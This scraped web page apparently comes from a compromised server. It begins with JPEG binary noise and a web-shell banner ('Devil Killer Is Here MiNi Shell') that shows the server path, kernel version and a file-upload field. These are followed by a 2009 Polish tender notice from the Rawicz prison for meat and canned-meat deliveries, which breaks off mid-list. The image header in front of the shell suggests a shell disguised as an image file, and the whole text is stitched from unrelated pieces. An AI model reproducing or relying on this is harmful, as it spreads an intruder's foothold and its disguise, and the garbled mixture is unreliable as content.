JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/65826-N-2009.html

<p class="kh_header"><b>Rawicz: Przedmiotem zamówienia są dostawy mięsa, podrobów, wędlin i konserw.</b><br>
<b>Numer ogłoszenia: 65826 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rawiczu , ul. 17 Stycznia 28, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5468500, 5468551,53,56, faks 065 5454266.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są dostawy mięsa, podrobów, wędlin i konserw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest/są:
Zadanie nr 1: Dostawy mięsa i wędlin z indyka
mięso klopsowe z indyka - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej ( bez dodatku przypraw) , 2.500 kg, CPV 15112220-4, PN-A-82011
mięso gulaszowe z indyka klasa II - mięso z indyka świeże, 1.700 kg, CPV 15112220-4, PN-A-86524
filet z indyka - mięso z indyka, elementy świeże, 2.200 kg, CPV 15112120-3, PN-A-86524
skrzydło środkowe z indyka - mięso z indyka, elementy świeże, 1.700 kg, CPV 15112220-4, PN-A-86524
mortadela z indyka - kiełbasa drobiowa, homogenizowana, parzona, 1200 kg, CPV 15131135-0 PN-A-86526
mortadela śniadaniowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 1200 kg, CPV 15131135-0, PN-A-86526
mortadela z pieczarkami - kiełbasa drobiowa, homogenizowana, parzona, 1800 kg, CPV 15131135-0, PN-A-86526
mortadela czosnkowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 2.000 kg, CPV 15131135-0, PN-A-86526
parówka z indyka - kiełbasa drobiowa, homogenizowana, wędzona, parzona, 1.500 kg, CPV 15131135-0, PN-A-86526
kiełbasa śniadaniowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 2.000 kg, CPV 15131135-0, PN-A-86526
kiełbasa litewska z indyka - kiełbasa drobiowa, średnio rozdrobniona, parzona, 2.800 kg, CPV 15131135-0, PN-A-86526
szynka tyrolska z indyka - wyrób blokowy, średnio rozdrobniony, parzony, 1.500 kg, CPV 15131135-0, PN-A-86526
szynka Gerwazego z indyka -  wyrób blokowy, grubo rozdrobniony, parzony, 900 kg, CPV 15131135-0, PN-A-86526
szynka mielona blok z indyka - wyrób blokowy, średnio rozdrobniony, parzony, 2.700 kg, CPV 15131135-0, PN-A-86526
polędwica firmowa z indyka - kiełbasa drobiowa, wysoko wydajna, parzona, 1.200 kg, CPV 15131135-0, PN-A-86526
pieczeń drobiowa z indyka - pieczeń drobiowa, średnio rozdrobniona, 2.000 kg, CPV 15131135-0, PN-A-86526
pasztet firmowy z indyka - wędlina drobiowa, podrobowa, parzona, 2.100 kg, CPV 15131310-1, PN-A-86526
salceson z indyka - wędlina drobiowa, podrobowa, parzona, 1.300 kg, CPV 15131310-0, PN-A-86526
kiełbasa krakowska parzona - wędlina parzona, grubo rozdrobniona, 700 kg, CPV 15131130-5, PN-A-82007
szynka gotowana biała - mięso wieprzowo-drobiowe, mięsień, gotowana, 850 kg, CPV 15131133-6, PN-A-82007
kiełbasa szynkowa drobiowa - wędlina parzona, grubo rozdrobniona, 650 kg, CPV 15131135-0, PN-A-82007
serdelki drobiowe - wędlina drobiowa, homogenizowana, drobno rozdrobniona, 3.900 kg, CPV 15131135-0, PN-A-86526

Zadanie nr 2: Dostawy mięsa i podrobów z kurczaka
kurczak cały - mięso z kurczaka, cały, mrożony, 3.200 kg, CPV 15112130-6, PN-A-86520
skrzydełka z kurczaka - mięso kurczak - elementy mrożone, 350 kg, CPV 15112210-1, PN-A-86524
udko z kurczaka - mięso kurczak - elementy mrożone, 1.500 kg, CPV 15112210-1, PN-A-86524
filet z kurczaka - mięso kurczak - elementy świeże, 1.200 kg, CPV 15112210-1, PN-A-86524
mięso gulaszowe z kurczaka - mięso kurczak - świeże, 800 kg, CPV 15112210-1, PN-A-86524
żołądki z kurczaka - podroby - żołądki z kurczaka mrożone, 300 kg, CPV 15114000-0, PN-A-86523
serca z kurczaka - podroby - żołądki z kurczaka mrożone, 300 kg, CPV 15114000-0, PN-A-86523
wątróbki z kurczaka - podroby - wątroby z kurczaka mrożone, 1.600 kg, CPV 15112300-9, PN-A-86523

Zadanie nr 3: Dostawy mięsa, podrobów i wędlin wołowych i wieprzowych
mięso wieprzowe  szynka surowa ( D4 ) - mięso wieprzowe, elementy świeże, 2.500 kg, CPV 15131410-2, PN-86/A-82002
mięso wieprzowe klopsowe (stosunek mięsa do tłuszczu 80/20) - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej, bez dodatku przypraw 2.300 kg, CPV 15113000-3, PN-A-82011
mięso wieprzowe łopatka bez kości - mięso wieprzowe, elementy świeże, 4.000 kg, CPV 15113300-6, PN-86/A-82002
mięso wieprzowe gulaszowe (stosunek mięsa do tłuszczu 50/50) - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej, 4.500 kg, CPV 15113300-6, PN-A-82011
mięso wieprzowe schab bez kości - mięso wieprzowe, elementy świeże, 950 kg, CPV 15113100-4, PN-86/A-82002
boczek wędzony bez kości płaty -  mięso wieprzowe, elementy świeże, wędzone, 1.400 kg, CPV 15131200-7, PN-A-82007
wędzonka bigosowa bez kości - mięso wieprzowe, elementy świeże, wędzone, 2.500 kg, CPV 15131200-7, PN-A-82007
słonina płaty - świeża, 1.200 kg, CPV 15113000-3, PN-86/A-82002
mięso wołowe bez kości ekstra - mięso wołowe, elementy świeże, 600 kg, CPV 15111190-2, PN-88/A-82003
mięso wołowe antrykot - mięso wołowe, elementy świeże, 500 kg, CPV 15111140-2, PN-88/A-82003
mięso wołowe z kością - żebra - mięso wołowe, elementy świeże, 900 kg, CPV 15111100-0, PN-88/A-82003
żołądki wieprzowe - podroby świeże, 2.900 kg, CPV 15114000-0, PN-86/A-82004
żołądki wołowe - podroby świeże, 100 kg, CPV 15114000-0, PN-86/A-82004
ozory wieprzowe - podroby świeże, 1.850 kg, CPV 15114000-0, PN-86/A-82004
serca wieprzowe - podroby świeże, 2.300 kg, CPV 15114000-0, PN-86/A-82004
wątroba wieprzowa - podroby świeże, 3.000 kg, CPV 15114000-0, PN-86/A-82004
kiełbasa zwyczajna - wędlina średnio rozdrobniona, 4.600 kg, CPV 15131130-5, PN-A-82007
kiełbasa parówkowa - wędlina parzona, homogenizowana, drobno rozdrobniona, 3.400 kg,CPV 15131130-5, PN-A-82007
kiełbasa biała parzona - wędlina parzona, średnio rozdrobniona, 3.000 kg, CPV 15131130-5, PN-A-82007
kiełbasa mortadela - wędlina homogenizowana, drobno rozdrobniona, 3.000 kg, CPV 15131130-3, PN-A-82007
kiełbasa golonkowa parzona - wędlina parzona, grubo rozdrobniona, 500 kg, CPV 15131133-6, PN-A-82007
kiełbasa mielonka - wędlina parzona, średnio rozdrobniona, 2.500 kg, CPV 15131133-6, PN-A-82007
kiełbasa słoikowa - wędlina parzona, średnio rozdrobniona, 1.400 kg, CPV 15131133-6, PN-A-82007
kiełbasa szynkowa mielona wieprzowa - wędlina drobno rozdrobniona, 1.500 kg, CPV 15131133-6, PN-A-82007
serdelki śląskie - wędlina drobno rozdrobniona, 1.000 kg, CPV 15131133-6, PN-A-82007
pieczeń wielkopolska - wyrób blokowy średnio rozdrobniony, 2.600 kg, CPV 15131133-6, PN-A-82007
wątrobianka - wędlina podrobowa, 3.000 kg, CPV 15131130-2, PN-A-82007
metka cebulowa - wędlina drobno rozdrobniona, 2.500 kg, CPV 15131133-6, PN-A-82007
salceson czarny - wędlina podrobowa, 1.400 kg, CPV 15131134-3, PN-A-82007
kaszanka  -  wędlina podrobowa, parzona, 3.500 kg, CPV 15131134-3, PN-A-82007

Zadanie nr 4: Dostawy konserw mięsnych
konserwa pasztet z indyka - puszka samootwieralna do 300 g, 800 kg, CPV 15131310-1, PN-A-82022
konserwa pasztet drobiowy - puszka samootwieralna do 300 g, 400 kg, CPV 15131310-1, PN-A-82022
konserwa pasztet z gęsi - puszka samootwieralna do 300 g, 1.400 kg, CPV 15131310-1, PN-A-82022
konserwa wołowa - puszka samootwieralna do 400 g, 1.000 kg, CPV 15131000-5, PN-A-82022
konserwa wieprzowa - puszka samootwieralna do 400 g, 1.100 kg, CPV 15131000-5, PN-A-82022

Przedstawione wyżej nazwy oznaczają kolejno: przedmiot zamówienia, grupę asortymentową, szacunkowe potrzeby w kilogramach, kod CPV wg Wspólnego Słownika Zamówień, wymagania wg Polskich Norm.
Nazwy poszczególnych wędlin i wyrobów podane w opisie przedmiotu zamówienia przyjęły się na polskim rynku w wyniku długoletniego stosowania norm branżowych i w tym rozumieniu zostały użyte. Nazwom tym są przypisane różniące je walory smakowe i jakościowe, przy jednoczesnym obowiązku zastosowania Polskich Norm w zakresie cech zewnętrznych, cech na przekroju, smaku i zapachu, cech charakterystycznych oraz wymagań chemicznych.
Mięsa świeże i wędliny winny być pakowane w paczki 1-5 kg w modyfikowanej atmosferze MAP. Kaszanka winna być pakowana w osłonce poliamidowej o przekroju 80-120 mm.
Wszystkie w/w produkty muszą spełniać normy co do jakości jakie wynikają z obowiązujących przepisów polskiego prawa dla produktów żywnościowych, w szczególności z przepisów ustawy z dnia 16 grudnia 2005  roku o produktach pochodzenia zwierzęcego (Dz. U. z 2006 roku nr 17, poz. 127 z póz. zmianami). 
Podane ilości są szacunkowe i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłaszania roszczeń z tytułu nie zrealizowanych dostaw lub podstawą do odmowy realizacji dostaw. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia wielkości dostaw w zależności od ilości osadzonych oraz wysokości stawki żywieniowej przypadającej na jednego skazanego. Dostawcy będzie przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2, 15.13.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości zamówienia w wysokości: 12.000,00 zł, słownie: dwanaście tysięcy złotych 00/100. 

Dla zadania nr 1: w wysokości: 4.500,00 zł, słownie: cztery tysiące pięćset złotych 00/100.

Dla zadania nr 2: w wysokości: 900,00 zł, słownie: dziewięćset złotych 00/100.

Dla zadania nr 3: w wysokości: 6.100,00 zł, słownie: sześć tysięcy sto złotych 00/100.

Dla zadania nr 4: w wysokości: 500,00 zł, słownie: pięćset złotych 00/100.

Wykonawca wnosi wadium:
  1) w pieniądzu przelewem na konto zamawiającego: 
	NBP o/Poznań numer konta 28 1010 1469 0035 8013 9120 0000 
lub w jednej z poniżej podanych form:
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3) w gwarancjach bankowych,
4) w gwarancjach ubezpieczeniowych 
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824), sposób przekazania:
Dokumenty wymienione w pkt 2, 3, 4,5 należy złożyć w siedzibie zamawiającego (w dziale finansowym ) przed upływem terminu składania ofert. 
Wadium wniesione w pieniądzu ( pkt.1 ) musi być dostępne na koncie zamawiającego w przeddzień otwarcia ofert,  czyli 01.04.2009 roku.  
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.,<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu
O udzielenie zamówienie mogą ubiegać się oferenci, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
2)	posiadają niezbędna wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełnienia warunków udziału w postępowaniu przez wykonawców odbędzie się na podstawie przedstawionych zamawiającemu dokumentów i oświadczeń

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne

Z ubiegania się o udzielenie zamówienia publicznego wyklucza się:
- wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych,

Zamawiający odrzuca ofertę, która:
1) jest niezgodna z ustawą;
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3;
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub nie zaproszonego do składania ofert;
6) zawiera błędy w obliczeniu ceny;
7) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
8) jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Dokumenty wymagane:
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
-	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału zakładu ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.  









	
2. Dokumenty wymagane w przypadku składania oferty wspólnej
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, dla każdego z konsorcjantów;
-	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału zakładu ubezpieczeń Społecznych dla każdego z konsorcjantów; potwierdzających odpowiednio, że dany wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.  

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rawiczu
ul. 17 Stycznia 28
63-900 Rawicz
fax: 0655454266.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2009 godzina 09:00, miejsce: . Oferty należy składać w:
siedzibie zamawiającego
Zakład Karny w Rawiczu
17 Stycznia 28
63-900 Rawicz
w Sekretariacie Zakładu Karnego

do dnia 2009-04-02 do godz. 9:00.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: Dostawy mięsa i wędlin z indyka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mięso klopsowe z indyka - produkt mięsny, średnio rozdrobniony, nie poddany obróbce termicznej ( bez dodatku przypraw) , 2.500 kg, CPV 15112220-4, PN-A-82011
mięso gulaszowe z indyka klasa II - mięso z indyka świeże, 1.700 kg, CPV 15112220-4, PN-A-86524
filet z indyka - mięso z indyka, elementy świeże, 2.200 kg, CPV 15112120-3, PN-A-86524
skrzydło środkowe z indyka - mięso z indyka, elementy świeże, 1.700 kg, CPV 15112220-4, PN-A-86524
mortadela z indyka - kiełbasa drobiowa, homogenizowana, parzona, 1200 kg, CPV 15131135-0 PN-A-86526
mortadela śniadaniowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 1200 kg, CPV 15131135-0, PN-A-86526
mortadela z pieczarkami - kiełbasa drobiowa, homogenizowana, parzona, 1800 kg, CPV 15131135-0, PN-A-86526
mortadela czosnkowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 2.000 kg, CPV 15131135-0, PN-A-86526
parówka z indyka - kiełbasa drobiowa, homogenizowana, wędzona, parzona, 1.500 kg, CPV 15131135-0, PN-A-86526
kiełbasa śniadaniowa z indyka - kiełbasa drobiowa, homogenizowana, parzona, 2.000 kg, CPV 15131135-0, PN-A-86526
kiełbasa litewska z indyka - kiełbasa drobiowa, średnio rozdrobniona, parzona, 2.800 kg, CPV 15131135-0, PN-A-86526
szynka tyrolska z indyka - wyrób blokowy, średnio rozdrobniony, parzony, 1.500 kg, CPV 15131135-0, PN-A-86526
szynka Gerwazego z indyka -  wyrób blokowy, grubo rozdrobniony, parzony, 900 kg, CPV 15131135-0, PN-A-86526
szynka mielona blok z indyka - wyrób blokowy, średnio rozdrobniony, parzony, 2.700 kg, CPV 15131135-0, PN-A-86526
polędwica firmowa z indyka - kiełbasa drobiowa, wysoko wydajna, parzona, 1.200 kg, CPV 15131135-0, PN-A-86526
pieczeń drobiowa z indyka - pieczeń drobiowa, średnio rozdrobniona, 2.000 kg, CPV 15131135-0, PN-A-86526
pasztet firmowy z indyka - wędlina drobiowa, podrobowa, parzona, 2.100 kg, CPV 15131310-1, PN-A-86526
salceson z indyka - wędlina drobiowa, podrobowa, parzona, 1.300 kg, CPV 15131310-0, PN-A-86526
kiełbasa krakowska parzona - wędlina parzona, grubo rozdrobniona, 700 kg, CPV 15131130-5, PN-A-82007
szynka gotowana biała - mięso wieprzowo-drobiowe, mięsień, gotowana, 850 kg, CPV 15131133-6, PN-A-82007
kiełbasa szynkowa drobiowa - wędlina parzona, grubo rozdrobniona, 650 kg, CPV 15131135-0, PN-A-82007
serdelki drobiowe - wędlina drobiowa, homogenizowana, drobno rozdrobniona, 3.900 kg, CPV 15131135-0, PN-A-86526.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.22.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Dostawy mięsa i podrobów z kurczaka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kurczak cały - mięso z kurczaka, cały, mrożony, 3.200 kg, CPV 15112130-6, PN-A-86520
skrzydełka z kurczaka - mięso kurczak - elementy mrożone, 350 kg, CPV 15112210-1, PN-A-86524
udko z kurczaka - mięso kurczak - elementy mrożone, 1.500 kg, CPV 15112210-1, PN-A-86524
filet z kurczaka - mięso kurczak - elementy świeże, 1.200 kg, CPV 15112210-1, PN-A-86524
mięso gulaszowe z kurczaka - mięso kurczak - świeże, 800 kg, CPV 15112210-1, PN-A-86524
żołądki z kurczaka - podroby - żołądki z kurczaka mrożone, 300 kg, CPV 15114000-0, PN-A-86523
serca z kurczaka - podroby - żołądki z kurczaka mrożone, 300 kg, CPV 15114000-0, PN-A-86523
wątróbki z kurczaka - podroby - wątroby z kurczaka mrożone, 1.600 kg, CPV 15112300-9, PN-A-86523.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.30-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: Dostawy mięsa, podrobów i wędlin wołowych i wieprzowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mięso wieprzowe  szynka surowa ( D4 ) - mięso wieprzowe, elementy świeże, 2.500 kg, CPV 15131410-2, PN-86/A-82002
